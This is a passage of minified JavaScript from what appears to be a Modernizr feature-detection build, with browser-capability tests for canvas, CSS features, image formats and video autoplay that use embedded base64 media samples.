7/AgD+/wIA/v8CAP7/AwD8/wMA//8AAAEA//8AAAAAAAABAP//AQD//wAAAQD//wIA/f8DAP3/AwD+/wAAAgD9/wIA//8AAAEAAAD+/wMA/P8FAPv/BAD9/wIA//8AAP//AgD+/wIA/v8BAAAAAAD//wEAAAAAAP//AQD//wEA//8BAP//AAABAP7/AwD9/wIA//8BAP//AAABAP//AQD//wAAAQD//wEA//8BAP//AAABAAAA//8BAP7/AwD9/wMA/f8DAP3/AgD//wEA//8BAP7/AgD//wAAAgD8/wQA/f8CAP//AQD+/wMA/f8CAP7/AgD//wAAAAAAAAAAAAABAP7/AwD9/wIA/v8DAP3/AwD9/wIA/v8DAPz/BQD7/wQA/f8CAP7/AwD9/wMA/f8CAP//AQAAAP7/AwD+/wEA//8AAAEAAAAAAP//AAABAP//AQAAAP7/AwD9/wMA/f8CAP//AQD//wEA//8AAAIA/f8CAAAA//8BAAAA//8BAAAA/v8EAPv/BAD9/wIA//8AAAEA/v8CAP//AAABAP//AAABAP//AAABAP7/AwD8/wQA/f8CAAAA/v8DAP3/AwD9/wMA/v8BAAAA//8BAAAA//8CAP7/AQAAAAAAAAAAAAAA//8CAP7/AgD+/wIA/v8CAP7/AgD//wAAAQD//wAAAQD//wAAAQD//wAAAQD+/wIA//8AAAAAAQD+/wMA/f8CAP//AQD//wEA//8AAAEA/v8DAP3/AgD//wAAAAABAP7/AwD9/wIA//8AAAEA/v8DAP3/AgD//wAAAAABAP7/AwD8/wMA/v8CAP//AAD//wIA/v8CAP7/AQABAP7/AQAAAP//AgD/////AQD//wEAAAD//wEA/v8EAPv/BAD9/wMA/v8BAAAA//8BAAEA/P8GAPr/BQD8/wMA/v8BAAAA//8CAP7/AQABAP3/BAD7/wYA+/8EAPz/AwD//wEA//8BAP7/BAD8/wMA/v8AAAIA/v8BAAAA//8BAAAA//8BAAAA//8CAP3/AwD+/wAAAgD8/wUA/P8DAP7/AAABAAAAAAD//wEAAAD//wIA/f8DAP7/AQAAAAAAAAAAAAAAAAAAAAAAAAAAAAEA/f8EAPz/AwD/////AgD+/wIA/f8DAP7/AgD+/wEA//8CAP7/AQD//wEAAAAAAP//AQAAAP//AgD9/wMA/v8BAAAA//8BAP//AQAAAP//AAACAP3/BAD7/wQA/v8BAAAA//8BAP//AQAAAP//AQAAAP7/BAD7/wUA+/8EAP3/AgD//wAAAQD+/wIA//8AAAEA/v8CAP//AQD+/wEAAAAAAAAAAAD//wEA//8CAP3/AwD9/wIA//8AAAAAAAAAAAAA//8BAP//AgD+/wEA//8CAP7/AQAAAP//AgD/////AgD/////AgD+/wIA//8AAP//AQABAP7/AgD9/wMA/v8CAP////8BAAAAAAAAAAAA//8CAP////8DAPz/AwD+/wEAAAAAAP//AQD//wEAAAD//wEAAAD+/wQA+/8FAPz/AgAAAP//AgD9/wMA/v8BAAAAAAD//wEAAAD//wIA/v8BAAAAAAD//wIA/v8BAAAA//8BAAAA//8CAP7/AQD//wEA//8BAAAA//8BAP//AAABAP//AQAAAP7/AgD//wEA//8AAAAAAQD+/wMA/P8EAP7///8DAPz/BQD8/wEAAQD+/wMA/v8AAAEA//8BAP//AQD//wEA/v8CAP//AQD//wAAAAABAAAA//8BAP//AQAAAAAA//8BAP//AgD+/wAAAQD//wIA/f8CAP//AQAAAP7/AwD9/wMA/v8BAP//AAABAP//AgD9/wIA//8BAAAA//8BAAAA//8CAP3/AwD+/wEAAAD+/wQA/P8DAP7/AAACAP7/AQAAAP//AQAAAP//AQAAAP//AgD9/wIAAAD//wIA/f8DAP7/AQD//wEA//8CAP7/AQD//wAAAQD//wEA//8AAAAAAQD//wEAAAD9/wUA+/8FAPz/AgD//wAAAQD//wAAAQD+/wMA/f8BAAEA/v8CAP7/AgD+/wIA/v8BAAAAAAAAAAAAAAD//wIA/v8CAP////8CAP7/AgD+/wIA/v8CAP7/AQAAAP//AQAAAP//AQD//wAAAQD//wAAAQD+/wMA/f8CAAAA/v8DAP3/AgAAAP//AQAAAP7/AwD9/wMA/v8BAP//AQD//wEAAAD+/wMA/f8CAAAA/v8CAP//AAAAAAEA//8AAAEA/v8DAP3/AwD9/wIA//8BAP//AgD8/wQA/v8BAAAA/v8CAP//AQD//wAAAAAAAAEA/f8EAPz/BAD9/wIA//8AAAAAAAABAP//AAAAAAAAAAABAP3/BAD9/wIA/v8BAAEA//8AAAAA//8CAP7/AgD9/wQA+/8FAPv/BQD8/wMA/f8DAP3/AwD+/wAAAgD9/wMA/f8CAAAA/v8EAPv/BQD7/wUA/P8DAP///v8DAP3/BAD8/wMA/f8DAP7/AQD//wEAAAD//wEA/v8CAAAA/v8CAP7/AgD//wAAAAAAAAAAAQD+/wIA//8AAAEA/v8DAPz/BAD9/wIA//8AAP//AgD//wEA/v8BAAAAAQD//wAAAAAAAAEA//8AAAEA//8BAP//AAABAP//AQD+/wIA/v8DAPz/BAD8/wQA/f8BAAAAAQD+/wMA/P8DAP//AAAAAAAAAAD//wMA+/8FAP3/AQABAP3/BAD8/wMA/v8BAAAA//8CAP3/AwD+/wEAAQD9/wMA/f8EAPz/BAD7/wQA/v8BAAEA/f8DAP7/AQAAAP//AgD+/wEAAAD//wIA/v8CAP7/AgD+/wEAAQD//wEA/v8CAP7/BAD7/wQA/f8CAAAA//8AAAAAAAABAP//AQD+/wEAAQD+/wMA/f8BAAEA/v8DAPz/AwD/////AwD8/wQA/P8DAP7/AgD//wAA//8BAAAAAAAAAP//AgD+/wEAAAD//wIA/v8BAAAA//8CAP3/AgD//wAAAQD+/wIA/v8BAAAA//8CAP7/AgD+/wEA//8CAP3/BAD7/wQA/v8BAAAA//8AAAEAAAD//wIA/f8DAP7/AgD+/wIA/v8CAP7/AgD+/wEAAAAAAP//AgD9/wMA/v8BAP//AgD9/wMA/v8AAAEA//8BAP//AQD//wEA//8AAAEA/v8EAPz/AgD//wAAAQAAAP//AAABAP//AQD//wEAAAD//wEA//8BAAEA/f8DAP7/AQABAP3/AwD+/wIA/////wEAAAAAAAAAAAD//wIA/v8CAP////8CAP7/AgD//wAA//8CAP3/BAD9/wAAAgD9/wMA/v8BAP//AQAAAP//AQAAAP//AgD9/wMA/f8EAPz/AwD+/wEAAAAAAAAAAAD//wIA/f8EAP3/AAABAAAA//8CAP7/AQAAAP//AQAAAAAA//8BAP//AQAAAP//AQAAAP//AQAAAP//AgD9/wMA/v8BAP//AQAAAP//AQD//wIA/v8CAP3/BAD9/wEAAAD//wEAAQD9/wMA/f8CAAAA/v8DAP3/AgD//wAAAQD+/wIA/v8CAP7/AQAAAP//AgD+/wEAAAAAAP//AwD7/wUA/f8BAAEA/v8BAAEA/v8DAP3/AgD//wEA//8BAP//AQD//wEA//8CAP3/BAD7/wQA/////wIA/v8AAAIA/v8CAP3/BAD7/wUA/P8DAP3/AwD9/wMA/v8AAAIA/v8CAP7/AgD+/wIA//8AAAEA/v8CAP7/AgD//wAAAAD//wEAAAAAAAAA//8BAP7/BAD7/wUA/P8CAAAA//8BAP//AQAAAP//AgD9/wMA/v8BAAAA//8BAAAA//8CAP3/AwD+/wEA//8CAP3/AwD+/wAAAwD8/wIAAAD//wIA/////wIA/v8CAP7/AgD+/wEAAAAAAAAAAAAAAP//AgD+/wIA//8AAAAA//8CAP7/AgD+/wEA//8CAP3/AwD9/wMA/v8BAP7/AwD9/wMA/f8CAP//AQD+/wIA//8BAP//AQD+/wMA/v8BAAAA//8BAAAA//8CAP7/AQAAAP//AgD+/wIA/v8CAP//AAAAAAEA//8BAP//AAABAAAA//8BAP//AQD//wEA//8BAP//AQAAAP//AQD//wEAAAD//wIA/f8CAAAA//8BAAAA//8BAP//AAABAP//AQD//wAAAAAAAAEA/v8CAP//AQD//wAAAAABAP7/AwD9/wIAAAD+/wIA//8BAP//AgD9/wMA/f8DAP7/AgD+/wEAAAAAAAEA/v8CAP7/AgD//wAAAAAAAAAAAAAAAP//AgD/////AgD9/wQA/f8BAAAAAAAAAAEA/f8DAP////8DAP3/AQABAP7/AgD//wAAAQD+/wMA/f8CAP7/AQABAP7/AwD7/wYA+v8FAP3/AQABAP7/AgD+/wMA/f8CAP7/AwD+/wEA//8BAP//AQAAAP7/BQD5/wcA+v8FAPz/AwD+/wIA/v8BAAAA//8DAPv/BQD8/wMA/////wEAAAAAAAAAAAD//wIA/f8DAP7/AQAAAP//AQAAAP//AgD+/wIA/v8BAAEA/f8EAPz/AwD+/wEA//8CAP7/AQD//wEA//8CAP7/AQAAAP//AgD+/wEAAAAAAAAAAAAAAAAAAAD//wIA/f8EAPz/AwD+/wEA//8CAP7/AgD+/wEAAQD+/wEAAQD+/wIA/////wIA//8AAAAAAAAAAAAAAAD//wEAAAAAAP//AgD9/wMA/v8BAP//AQAAAP//AQD//wEA//8BAP//AQD//wEA//8BAP//AQAAAP7/AwD9/wMA/v8BAP7/AwD9/wMA/v8BAP//AAABAP//AQD//wAAAAABAP//AAAAAAAAAQD//wEA/v8CAAAA/v8EAPv/BAD9/wIAAAD+/wMA/P8DAP//AAAAAP//AQD//wIA/f8DAP3/AwD9/wMA/v8BAAAA//8BAAAA//8CAP3/AwD9/wQA+/8FAPv/BQD8/wMA/v8BAAAA//8BAP//AgD+/wEAAAD//wIA/v8BAAEA/f8DAP3/AgAAAP//AQD//wAAAQD//wEA//8BAP//AQD//wEA/v8DAP3/AgAAAP7/AwD9/wIAAAD//wEAAAD//wIA/f8DAP7/AgD9/wQA+/8FAPz/AgAAAP//AgD9/wIA//8BAP//AQD//wEA//8BAP//AQD//wIA/f8DAP3/AgD//wAAAQD+/wIA/v8BAAEA/v8CAP7/AgD+/wMA/P8DAP//AAABAP7/AQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEA/v8CAP3/BAD8/wMA/v8BAAAAAAD//wEAAAAAAAAAAAD//wEAAAAAAAAA//8BAP//AgD+/wEA//8CAP3/AwD9/wMA/f8EAPv/BAD+/wAAAQD//wEA//8BAP//AAABAP//AQD//wEAAAD//wEA//8BAP//AgD9/wMA/v8AAAIA/f8DAP7/AAACAP3/AwD+/wEA//8BAP//AQAAAP//AQAAAP7/AwD9/wMA/v8AAAEA//8BAP//AAAAAAEA//8AAAEA/v8CAP//AAAAAAEA/v8DAPz/BAD9/wEAAQD+/wEAAQD9/wQA/P8DAP7/AQAAAAAAAAAAAAAAAAAAAAAAAQD+/wIA/////wIA/v8BAAAA//8BAP//AQD//wEA//8BAAAA/v8EAPz/AwD///7/BAD8/wMA/////wIA/v8CAP////8CAP7/AgD+/wIA/v8CAP////8CAP7/AwD9/wIA/v8CAP//AAABAP7/AwD9/wEAAQD+/wMA/f8CAP//AAAAAAEA/v8DAPz/BAD9/wIA/v8CAP7/AgD//wAAAAD//wIA/v8CAP7/AQAAAAAA//8CAP7/AgD+/wIA/v8CAP7/AwD8/wUA+v8GAPv/AwD//wAAAAAAAAAA//8DAPv/BQD9/wAAAgD9/wMA/v8BAP//AQAAAP//AgD9/wMA/v8BAAAA//8BAAAAAAAAAP//AQAAAAAAAAD//wEA//8CAP3/AwD+/wAAAgD+/wEAAAD//wIA/v8CAP7/AgD/////AwD8/wUA/P8CAP//AQD//wIA/f8DAP3/AwD+/wAAAQD+/wMA/f8DAP3/AgD//wAAAQD//wEA//8BAP7/AwD+/wEA//8AAAEA//8CAPz/BAD9/wIA//8AAAEA/v8DAPz/BAD9/wIA//8AAAEA/v8CAP7/AgD//wEA/f8EAPz/BAD+////AgD//wAAAQD//wAAAQD//wEA//8BAP7/AwD+/wEA"}}catch(o){return void addTest("audiopreload",!1)}r.setAttribute("preload","auto"),r.style.cssText="display:none",docElement.appendChild(r),setTimeout(function(){r.addEventListener("loadeddata",A,!1),e=setTimeout(A,t)},0)}),Modernizr.addTest("canvasblending",function(){if(Modernizr.canvas===!1)return!1;var A=createElement("canvas").getContext("2d");try{A.globalCompositeOperation="screen"}catch(e){}return"screen"===A.globalCompositeOperation});var canvas=createElement("canvas");Modernizr.addTest("todataurljpeg",function(){return!!Modernizr.canvas&&0===canvas.toDataURL("image/jpeg").indexOf("data:image/jpeg")}),Modernizr.addTest("todataurlpng",function(){return!!Modernizr.canvas&&0===canvas.toDataURL("image/png").indexOf("data:image/png")}),Modernizr.addTest("todataurlwebp",function(){var A=!1;try{A=!!Modernizr.canvas&&0===canvas.toDataURL("image/webp").indexOf("data:image/webp")}catch(e){}return A}),Modernizr.addTest("canvaswinding",function(){if(Modernizr.canvas===!1)return!1;var A=createElement("canvas").getContext("2d");return A.rect(0,0,10,10),A.rect(2,2,6,6),A.isPointInPath(5,5,"evenodd")===!1}),Modernizr.addTest("bgpositionshorthand",function(){var A=createElement("a"),e=A.style,t="right 10px bottom 10px";return e.cssText="background-position: "+t+";",e.backgroundPosition===t}),Modernizr.addTest("csscalc",function(){var A="width:",e="calc(10px);",t=createElement("a");return t.style.cssText=A+prefixes.join(e+A),!!t.style.length}),Modernizr.addTest("cubicbezierrange",function(){var A=createElement("a");return A.style.cssText=prefixes.join("transition-timing-function:cubic-bezier(1,0,0,1.1); "),!!A.style.length}),Modernizr.addTest("cssgradients",function(){for(var A,e="background-image:",t="gradient(linear,left top,right bottom,from(#9f9),to(white));",r="",n=0,o=prefixes.length-1;o>n;n++)A=0===n?"to ":"",r+=e+prefixes[n]+"linear-gradient("+A+"left top, #9f9, white);";Modernizr._config.usePrefixes&&(r+=e+"-webkit-"+t);var i=createElement("a"),d=i.style;return d.cssText=r,(""+d.backgroundImage).indexOf("gradient")>-1}),Modernizr.addTest("multiplebgs",function(){var A=createElement("a").style;return A.cssText="background:url(https://),url(https://),red url(https://)",/(url\s*\(.*?){3}/.test(A.background)}),Modernizr.addTest("opacity",function(){var A=createElement("a").style;return A.cssText=prefixes.join("opacity:.55;"),/^0.55$/.test(A.opacity)}),Modernizr.addTest("csspointerevents",function(){var A=createElement("a").style;return A.cssText="pointer-events:auto","auto"===A.pointerEvents}),Modernizr.addTest("csspositionsticky",function(){var A="position:",e="sticky",t=createElement("a"),r=t.style;return r.cssText=A+prefixes.join(e+";"+A).slice(0,-A.length),-1!==r.position.indexOf(e)}),Modernizr.addTest("cssremunit",function(){var A=createElement("a").style;try{A.fontSize="3rem"}catch(e){}return/rem/.test(A.fontSize)}),Modernizr.addTest("rgba",function(){var A=createElement("a").style;return A.cssText="background-color:rgba(150,255,150,.5)",(""+A.backgroundColor).indexOf("rgba")>-1}),Modernizr.addTest("preserve3d",function(){var A,e,t=window.CSS,r=!1;return t&&t.supports&&t.supports("(transform-style: preserve-3d)")?!0:(A=createElement("a"),e=createElement("a"),A.style.cssText="display: block; transform-style: preserve-3d; transform-origin: right; transform: rotateY(40deg);",e.style.cssText="display: block; width: 9px; height: 1px; background: #000; transform-origin: right; transform: rotateY(40deg);",A.appendChild(e),docElement.appendChild(A),r=e.getBoundingClientRect(),docElement.removeChild(A),r=r.width&&r.width<4)}),Modernizr.addTest("createelementattrs",function(){try{return"test"==createElement('<input name="test" />').getAttribute("name")}catch(A){return!1}},{aliases:["createelement-attrs"]}),Modernizr.addTest("dataset",function(){var A=createElement("div");return A.setAttribute("data-a-b","c"),!(!A.dataset||"c"!==A.dataset.aB)}),Modernizr.addTest("hidden","hidden"in createElement("a")),Modernizr.addTest("outputelem","value"in createElement("output")),Modernizr.addTest("progressbar",createElement("progress").max!==undefined),Modernizr.addTest("meter",createElement("meter").max!==undefined),Modernizr.addTest("ruby",function(){function A(A,e){var t;return window.getComputedStyle?t=document.defaultView.getComputedStyle(A,null).getPropertyValue(e):A.currentStyle&&(t=A.currentStyle[e]),t}function e(){docElement.removeChild(t),t=null,r=null,n=null}var t=createElement("ruby"),r=createElement("rt"),n=createElement("rp"),o="display",i="fontSize";return t.appendChild(n),t.appendChild(r),docElement.appendChild(t),"none"==A(n,o)||"ruby"==A(t,o)&&"ruby-text"==A(r,o)||"6pt"==A(n,i)&&"6pt"==A(r,i)?(e(),!0):(e(),!1)}),Modernizr.addTest("template","content"in createElement("template")),Modernizr.addTest("time","valueAsDate"in createElement("time")),Modernizr.addTest("texttrackapi","function"==typeof createElement("video").addTextTrack),Modernizr.addTest("track","kind"in createElement("track")),Modernizr.addTest("unknownelements",function(){var A=createElement("a");return A.innerHTML="<xyz></xyz>",1===A.childNodes.length}),Modernizr.addTest("capture","capture"in createElement("input")),Modernizr.addTest("fileinput",function(){if(navigator.userAgent.match(/(Android (1.0|1.1|1.5|1.6|2.0|2.1))|(Windows Phone (OS 7|8.0))|(XBLWP)|(ZuneWP)|(w(eb)?OSBrowser)|(webOS)|(Kindle\/(1.0|2.0|2.5|3.0))/))return!1;var A=createElement("input");return A.type="file",!A.disabled}),Modernizr.addTest("fileinputdirectory",function(){var A=createElement("input"),e="directory";if(A.type="file",e in A)return!0;for(var t=0,r=domPrefixes.length;r>t;t++)if(domPrefixes[t]+e in A)return!0;return!1}),Modernizr.addTest("formattribute",function(){var A,e=createElement("form"),t=createElement("input"),r=createElement("div"),n="formtest"+(new Date).getTime(),o=!1;e.id=n;try{t.setAttribute("form",n)}catch(i){document.createAttribute&&(A=document.createAttribute("form"),A.nodeValue=n,t.setAttributeNode(A))}return r.appendChild(e),r.appendChild(t),docElement.appendChild(r),o=e.elements&&1===e.elements.length&&t.form==e,r.parentNode.removeChild(r),o}),Modernizr.addTest("placeholder","placeholder"in createElement("input")&&"placeholder"in createElement("textarea")),Modernizr.addTest("sandbox","sandbox"in createElement("iframe")),Modernizr.addTest("seamless","seamless"in createElement("iframe")),Modernizr.addTest("srcdoc","srcdoc"in createElement("iframe")),Modernizr.addAsyncTest(function(){if(!Modernizr.canvas)return!1;var A=new Image,e=createElement("canvas"),t=e.getContext("2d");A.onload=function(){addTest("apng",function(){return"undefined"==typeof e.getContext?!1:(t.drawImage(A,0,0),0===t.getImageData(0,0,1,1).data[3])})},A.src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACGFjVEwAAAABAAAAAcMq2TYAAAANSURBVAiZY2BgYPgPAAEEAQB9ssjfAAAAGmZjVEwAAAAAAAAAAQAAAAEAAAAAAAAAAAD6A+gBAbNU+2sAAAARZmRBVAAAAAEImWNgYGBgAAAABQAB6MzFdgAAAABJRU5ErkJggg=="}),Modernizr.addTest("imgcrossorigin","crossOrigin"in createElement("img")),Modernizr.addAsyncTest(function(){var A,e,t,r=createElement("img"),n="sizes"in r;!n&&"srcset"in r?(e="data:image/gif;base64,R0lGODlhAgABAPAAAP///wAAACH5BAAAAAAALAAAAAACAAEAAAICBAoAOw==",A="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==",t=function(){addTest("sizes",2==r.width)},r.onload=t,r.onerror=t,r.setAttribute("sizes","9px"),r.srcset=A+" 1w,"+e+" 8w",r.src=A):addTest("sizes",n)}),Modernizr.addTest("srcset","srcset"in createElement("img")),Modernizr.addTest("inputformaction",!!("formAction"in createElement("input")),{aliases:["input-formaction"]}),Modernizr.addTest("inputformenctype",!!("formEnctype"in createElement("input")),{aliases:["input-formenctype"]}),Modernizr.addTest("inputformmethod",!!("formMethod"in createElement("input"))),Modernizr.addTest("inputformtarget",!!("formtarget"in createElement("input")),{aliases:["input-formtarget"]}),Modernizr.addTest("scriptasync","async"in createElement("script")),Modernizr.addTest("scriptdefer","defer"in createElement("script")),Modernizr.addTest("stylescoped","scoped"in createElement("style")),Modernizr.addTest("inlinesvg",function(){var A=createElement("div");return A.innerHTML="<svg/>","http://www.w3.org/2000/svg"==("undefined"!=typeof SVGRect&&A.firstChild&&A.firstChild.namespaceURI)}),Modernizr.addTest("textareamaxlength",!!("maxLength"in createElement("textarea"))),Modernizr.addAsyncTest(function(){function A(i){n++,clearTimeout(e);var d=i&&"playing"===i.type||0!==o.currentTime;return!d&&r>n?void(e=setTimeout(A,t)):(o.removeEventListener("playing",A,!1),addTest("videoautoplay",d),void(o.parentNode&&o.parentNode.removeChild(o)))}var e,t=200,r=5,n=0,o=createElement("video"),i=o.style;if(!(Modernizr.video&&"autoplay"in o))return void addTest("videoautoplay",!1);i.position="absolute",i.height=0,i.width=0;try{if(Modernizr.video.ogg)o.src="data:video/ogg;base64,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";else{if(!Modernizr.video.h264)return void 